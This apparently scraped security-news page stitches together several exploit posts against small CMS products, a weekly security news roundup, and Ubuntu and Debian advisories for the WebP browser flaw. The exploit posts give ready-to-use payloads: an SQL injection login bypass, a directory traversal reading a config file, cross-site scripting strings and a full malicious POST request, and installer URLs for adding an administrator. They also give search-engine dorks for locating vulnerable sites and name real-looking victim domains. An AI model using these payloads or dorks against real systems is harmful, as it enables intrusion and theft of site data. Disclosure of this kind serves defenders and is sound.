KPK CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : KPK CMS v1.0 Auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.kpkcomputer.com/                                                                                        |  | # Dork      : "Developed by KPK Computer"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user & pass = ' or 0=0 #[+] http://Targetthai-modeling-associationorg/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

KPK CMS 1.0 SQL Injection

Karenderia MRS version 5.3 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Karenderia MRS v5.3 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit)                                               | | # Vendor    : https://github.com/ashishvazirani/food                                                                             |  | # Dork      : 1149 N GOWER ST, 90038 United States Call Us 111111111                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /exportmanager/ajax/getfiles?f=/../../protected/config/main.php[+] http://127.0.0.1Trgtbastisapp.com/kmrs/exportmanager/ajax/getfiles?f=/../../protected/config/main.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Karenderia MRS 5.3 Directory Traversal

A vulnerability was found in UCMS 1.4.7. It has been classified as problematic. Affected is an unknown function of the file ajax.php?do=strarraylist. The manipulation of the argument strdefault leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239856.

1.Download address: https://github.com/forget-code/ucms

2.Vulnerability file location: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php? do=strarraylist

3.You need to manually create the cache and uploadfile directories during program installation

4.Ucms-master /ucms/ajax.php installed successfully? do=strarraylist

5.Send a POST request as follows

POST /CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 64  
Origin: http://127.0.0.1  
DNT: 1  
Connection: close  
Cookie: admin\_470315=admin; psw\_470315=0fb277aadebd45b2ccc4834fe54aac4d; token\_470315=b59b44f8  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

cid=2&strdefault=<script>alert('xss')</script>

over!

CVE-2023-5015: The ucms has xss · Issue #3 · Num-Nine/CVE

Plus: Spyware-packing ads, TikTok GDPR violations, Elon Musk investigations, and more.

China-linked hackers are increasingly moving beyond espionage and into the disturbing world of power grid attacks. Threat researchers at security software firm Symantec this week released new evidence that the Chinese hacking group known as APT41 infiltrated the power grid of an Asian nation. Some details of the latest intrusion echo a 2021 attack on India’s power grid, suggesting the same hackers are responsible.

In Argentina, a scandal is playing out over the use of facial recognition software in Buenos Aires. Despite laws that require authorities to limit searches to known fugitives, an investigation by a judge found that the system was used to look up people not wanted for any crimes. In other cases, errors led police to arrest or question the wrong people. While Buenos Aires is attempting to get the system back online after legal rulings ordered it turned off, the debacle shows how dangerous facial recognition can be even when laws are in place to limit it.

Facial recognition isn’t the only artificial-intelligence-powered system governments are using in new and upsetting ways. Like everyone else, state and local governments around the United States have begun to play with generative AI tools like ChatGPT. And so far, there’s no consensus on how to use the technology. Some US states, like Maine, have temporarily banned its use altogether, fearing cybersecurity concerns, while others are using it to craft speeches and social media posts.

Meanwhile, the US Senate is in the midst of getting an AI education. Around 60 senators attended a closed-door briefing this week, where they heard from major tech CEOs, including Elon Musk, Mark Zuckerberg, and Sam Altman, as well as civil liberties advocates and AI ethics experts. The Senate has been learning about AI and its myriad issues for much of the year, and another forum on AI innovation is scheduled for later this year. Despite these cramming sessions, some lawmakers question whether they’re any closer to tackling AI responsibly.

Finally, the cyberattack against MGM casinos continues to cause havoc for guests of its resorts nearly a week after the attack began. While an attack on a major casino company is inevitably high-profile, the group behind the breach, known as Alphv, has a long history of targeting schools and hospitals—attacks that are far more consequential.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Unless you updated your browser in the past few days, it likely contains a critical flaw. The recently disclosed vulnerability exists in the WebP code library known as libwebp, which encodes and decodes images in the widely used WebP format. Known generally as a “heap buffer overflow,” the flaw can be exploited using a specially crafted malicious image, allowing an attacker to run malicious code on a targeted device. Google says the bug has already been exploited in the wild.

Initially identified early this week as a zero-day vulnerability in Google’s Chrome browser, the libwebp bug impacts browsers built using Chromium, which means Chrome, Mozilla’s Firefox, Microsoft Edge, Opera, Brave, and more. It also affects apps like Telegram, 1Password, Thunderbird, and Gimp. Patches for the flaw are rolling out now, so keep your eyes peeled for updates.

Malicious online ads—also known as “malvertising”—have been around for years. Now, they’re going pro. Several Israeli companies are developing exploits that take advantage of weaknesses in the technical mechanisms that bombard you with ads online, _Haaretz_ reports, allowing attackers to track people and hack their devices. The exploit takes advantage of the online advertising bidding process, in which bots are competing for specific ad slots on web pages in real time. Taking advantage of the fraction of a second before an ad slot is filled, these companies have figured out how to show you an ad that reportedly contains “advanced spyware.” While there’s no quick fix for stopping the spread of this malware, there is something simple you can do to protect yourself: Use an ad blocker.

European data regulators fined TikTok €345 million ($368 million) this week for breaking laws related to the privacy of underage users. The Irish Data Protection Commission (DPC) said the company violated GDPR by failing to make the accounts of child users private by default. The DPC also says TikTok’s “family pairing” feature, which enables an adult to take control of a child’s account settings, did not ensure that the adult with access to the feature was a parent or guardian. TikTok says it opposes the fine because it had updated its settings to make the accounts of anyone under 16 years old private by default before the investigation began.

Turns out, secretly interfering in the battle plans of a United States ally doesn’t go over well in Washington. The US Senate Armed Services Committee has launched an inquiry into Elon Musk’s decision to not enable Starlink satellite communications in Crimea ahead of a Ukrainian military attack on Russian forces. The move, first revealed in author Walter Isaacson’s new biography on Musk, also prompted several Democratic senators to send a letter to the US defense secretary, Lloyd Austin, asking him to explain what actions the Department of Defense (DOD) has taken, or plans to take, to “prevent further dangerous meddling” by Musk.

“SpaceX is a prime contractor and a critical industry partner for the \[DOD\] and the recipient of billions of dollars in taxpayer funding,” the letter reads. “We are deeply concerned with the ability and willingness of SpaceX to interrupt their service at Mr. Musk’s whim and for the purpose of handcuffing a sovereign country’s self-defense, effectively defending Russian interests.”

Even if you have a spotless record, passing a background check can be one of the most stressful parts of landing a new job or an apartment. We have bad news: It’s possible the information used to assess your eligibility might not be accurate. The US Federal Trade Commission (FTC) this week announced a $5.8 million fine against background check providers TruthFinder and Instant Checkmate for “failing to ensure the maximum possible accuracy of their consumer reports,” a violation of the Fair Credit Reporting Act. The FTC alleges that the companies “made millions” by selling subscriptions that would alert people when a “criminal record” was found in their background check, “when the record was merely a traffic ticket.” The company also displayed “Remove” and “Flag as Inaccurate” buttons that the FTC says “did not work as advertised.”

The regulatory ding against TruthFinder and Instant Checkmate comes several months after the companies confirmed a data breach. In January, hackers leaked the personal information of millions of customers by leaking an April 2019 database backup stolen from the companies.

You Need to Update Google Chrome or Whatever Browser You Use

Italia Mediasky CMS version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : İtalia Mediasky CMS v2.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.bereewineshop.com/admin/                                                                                |  | # Dork      : Mediasky - Lato Amministrativo                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Italia Mediasky CMS 2.0 Cross Site Scripting

Italia Mediasky CMS version 2.0 suffers from a cross site request forgery vulnerability.

Italia Mediasky CMS 2.0 Cross Site Request Forgery

Ubuntu Security Notice 6367-1 - It was discovered that Firefox did not properly manage memory when handling WebP images. If a user were tricked into opening a webpage containing malicious WebP image file, an attacker could potentially exploit these to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6367-1September 14, 2023firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to crash or run programs if it opened a maliciouswebsite.Software Description:- firefox: Mozilla Open Source web browserDetails:It was discovered that Firefox did not properly manage memory when handlingWebP images. If a user were tricked into opening a webpage containingmalicious WebP image file, an attacker could potentially exploit these tocause a denial of service or execute arbitrary code. (CVE-2023-4863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         117.0.1+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6367-1  CVE-2023-4863Package Information:  https://launchpad.net/ubuntu/+source/firefox/117.0.1+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6367-1

Debian Linux Security Advisory 5496-1 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5496-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 13, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4863

A buffer overflow in parsing WebP images may result in the execution of  
arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 102.15.1esr-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 102.15.1esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUCH1EACgkQEMKTtsN8  
TjZB7A//YpbXG3OOwqz3b83KzC0B2y53g1qcriYZ+PiUs+S0FNXX0ePnRJG2Txl1  
c82NjGrzTO+D+qTtj3Uj/KB2k/v9UleRE7yeqoZcZXqMgdXqWPl/2C/xNaKLdwRd  
YjtNl/KgdDPRIxozwov/fRuS6bUWOtsOpYLGtWsFCfK7Wik20TN36dJNPH+4qvgR  
/YwRV5cqpxAKnguVZoFuKyKLxAXm2KxZCOaH3Ft3f5Sk6MWWt4ayWgmrUOiRzdEB  
vu/h4itb/q/dnLB/O4u7EzFGK5TtHHpP+4YoeibI/JQD/geiAFCyBdbBSmVlLv2c  
8aUJLziUvawpE+5ig8b+7m5bwSsfCL5JNMYesVfM1joqY0ysKkwZj+WkYtfkVZQH  
SepJON7YTm9Hsbkx/WZ/RpF6VbW4/7YWcy9YN8Cevd2wQ4CSSicBpZ77MaPUgqWf  
cHCRYVKsTNLmUbDSAjKazUPbHPFNaiMEl2pG54xNfj6y4avyLnqOWmF00/kRoCG4  
EsA8LGZgrhImqzgZMPQNkEmwstjiADQ8b8himl5CCjwiy70YVm3PmYynH/SiSkow  
4/GpZsoDZZ1iWDnSQgw/8/WQ8PQFOkmMVV7wfAJ5RK6iVP3MJ7pNJEi0oY6a2SLk  
2IXg48oJF9tWiY/xq+JezTuU0zmC0P90YHz3rywvlVlXlJ/AR7M=  
=H7ya  
-----END PGP SIGNATURE-----

Debian Security Advisory 5496-1

iSmile Soft CMS version 0.3.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : iSmile Soft CMS v0.3.0 Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.helpernt.com/                                                                                          || # Dork      : JamalCom هذا السكربت مبرمج بواسطة                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] use payload : /install.php?etape=3[+] http://127.0.0.1/iSmile/install.php?etape=3Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iSmile Soft CMS 0.3.0 Add Administrator

islamnt CMS version 2.1.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 Add ADmin Vulnerability Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] Use payload : /install/?action=setup7[+] http://127.0.0.1/Islam/install/?action=setup7Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#firefox